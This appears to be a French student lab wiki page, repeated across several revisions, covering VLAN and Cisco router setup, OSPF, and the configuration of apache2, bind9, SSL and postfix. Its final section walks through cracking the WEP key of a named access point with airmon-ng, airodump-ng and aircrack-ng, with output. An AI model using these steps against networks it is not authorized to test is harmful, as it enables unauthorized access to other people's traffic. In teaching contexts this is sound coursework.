VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
<br />
[[File:Magic.gif]]<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par activer le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35415
TP sysres IMA2a5 2016/2017 G1
2016-11-25T11:31:34Z
<p>Dfourny : /* Attaque du WiFi */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
<br />
<br />
[[File:Magic.gif]]<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par active le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35414
TP sysres IMA2a5 2016/2017 G1
2016-11-25T11:24:24Z
<p>Dfourny : </p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
